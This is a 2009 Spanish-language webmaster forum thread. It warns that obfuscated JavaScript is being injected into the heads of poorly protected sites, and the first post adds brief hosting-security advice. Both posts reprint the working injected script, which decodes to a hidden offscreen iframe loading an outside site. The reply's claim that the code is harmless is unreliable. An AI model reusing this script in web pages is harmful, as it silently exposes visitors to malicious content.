Web masters! OJO CON ESTO!

kepainx · 16 Jul 2009

algunas empresas maliciosas estan inyectando codes javascript dentro de los heads vulnerables de las webs. especialmente archivos o carpetas que tienen accesos 777 en el server.

este code es un spyware, y google al detectarlo bloquea tu pagina.

'<script type="text/javascript">var kPvOkYUlTEBvLmAPjYUP =
"nd60nd105nd102nd114nd97nd109nd101nd32nd119nd105nd100nd116nd104nd61nd34nd52nd56nd48nd34nd32nd104nd101nd105nd103nd104nd116nd61nd34nd54nd48nd34nd32nd115nd114nd99nd61nd34nd104nd116nd116nd112nd58nd47nd47nd104nd105nd116nd45nd115nd101nd110nd100nd101nd114nd115nd46nd99nd110nd47nd102nd105nd110nd100nd47nd105nd110nd46nd99nd103nd105nd63nd49nd50nd34nd32nd115nd116nd121nd108nd101nd61nd34nd98nd111nd114nd100nd101nd114nd58nd48nd112nd120nd59nd32nd112nd111nd115nd105nd116nd105nd111nd110nd58nd114nd101nd108nd97nd116nd105nd118nd101nd59nd32nd116nd111nd112nd58nd48nd112nd120nd59nd32nd108nd101nd102nd116nd58nd45nd53nd48nd48nd112nd120nd59nd32nd111nd112nd97nd99nd105nd116nd121nd58nd48nd59nd32nd102nd105nd108nd116nd101nd114nd58nd112nd114nd111nd103nd105nd100nd58nd68nd88nd73nd109nd97nd103nd101nd84nd114nd97nd110nd115nd102nd111nd114nd109nd46nd77nd105nd99nd114nd111nd115nd111nd102nd116nd46nd65nd108nd112nd104nd97nd40nd111nd112nd97nd99nd105nd116nd121nd61nd48nd41nd59nd32nd45nd109nd111nd122nd45nd111nd112nd97nd99nd105nd116nd121nd58nd48nd34nd62nd60nd47nd105nd102nd114nd97nd109nd101nd62";var
LQweQmnfGaTqpPFaoZLH = kPvOkYUlTEBvLmAPjYUP.split("nd");var
dNCoADEkcYAnpwSFjFkp = "";for (var fDfVTkvHKHOnVRcVUgGw=1;
fDfVTkvHKHOnVRcVUgGw<LQweQmnfGaTqpPFaoZLH.length;
fDfVTkvHKHOnVRcVUgGw++){dNCoADEkcYAnpwSFjFkp+=String.fromCharCode(LQweQmnfGaTqpPFaoZLH[fDfVTkvHKHOnVRcVUgGw]);}document.write(dNCoADEkcYAnpwSFjFkp)</script>';

recomendaciones:
alojen sus webs en servers que tengan certificaciones de seguridad reconocidas o ssl
las paginas que necesiten permisos 777 usen requires o librerias protegidas con htacces
no abran ftps en computadores o sistepas operativos que ustedes no conoscan.

ןǝɹoɾ · 16 Jul 2009

<script type="text/javascript>
var OHDIOS! ="nd60nd105nd102nd114nd97nd109nd101nd32nd119nd105nd100nd116nd104nd61nd34nd52nd56nd48nd34nd32nd104nd101nd105nd103nd104nd116nd61nd34nd54nd48nd34nd32nd115nd114nd99nd61nd34nd104nd116nd116nd112nd58nd47nd47nd104nd105nd116nd45nd115nd101nd110nd100nd101nd114nd 115nd46nd99nd110nd47nd102nd105nd110nd100nd47nd105n d110nd46nd99nd103nd105nd63nd49nd50nd34nd32nd115nd1 16nd121nd108nd101nd61nd34nd98nd111nd114nd100nd101n d114nd58nd48nd112nd120nd59nd32nd112nd111nd115nd105 nd116nd105nd111nd110nd58nd114nd101nd108nd97nd116nd 105nd118nd101nd59nd32nd116nd111nd112nd58nd48nd112n d120nd59nd32nd108nd101nd102nd116nd58nd45nd53nd48nd 48nd112nd120nd59nd32nd111nd112nd97nd99nd105nd116nd 121nd58nd48nd59nd32nd102nd105nd108nd116nd101nd114n d58nd112nd114nd111nd103nd105nd100nd58nd68nd88nd73n d109nd97nd103nd101nd84nd114nd97nd110nd115nd102nd11 1nd114nd109nd46nd77nd105nd99nd114nd111nd115nd111nd 102nd116nd46nd65nd108nd112nd104nd97nd40nd111nd112n d97nd99nd105nd116nd121nd61nd48nd41nd59nd32nd45nd10 9nd111nd122nd45nd111nd112nd97nd99nd105nd116nd121nd 58nd48nd34nd62nd60nd47nd105nd102nd114nd97nd109nd10 1nd62";var
LISTAMALVADA = OHDIOS!.split("nd");
var DATOSDELDEMONIO = "";
for (var NUMEROMALDITO = 1; NUMEROMALDITO<LISTAMALVADA.length; NUMEROMALDITO++){
DATOSDELDEMONIO+=String.fromCharCode(LISTAMALVADA[NUMEROMALDITO]);
}
document.write(DATOSDELDEMONIO)
</script>

como pueden ver, he simplificado el codigo, tengan cuidado!!! el codigo es malvado y tiene el demonio adentro!! puede escribir un monton de numeros en un archivo que no existe!!! XD... por favor... que clase de codigo es ese jaja

-- nota, por lo que vi dudo mucho que sea un spy o lo que sea.. el caso es que no creo q haga nada.. de todas formas buscar info en google

Buscar

Buscar

Web masters! OJO CON ESTO!

kepainx

Lanero Regular

ןǝɹoɾ

Lanero Reconocido

Los últimos mensajes

Los últimos temas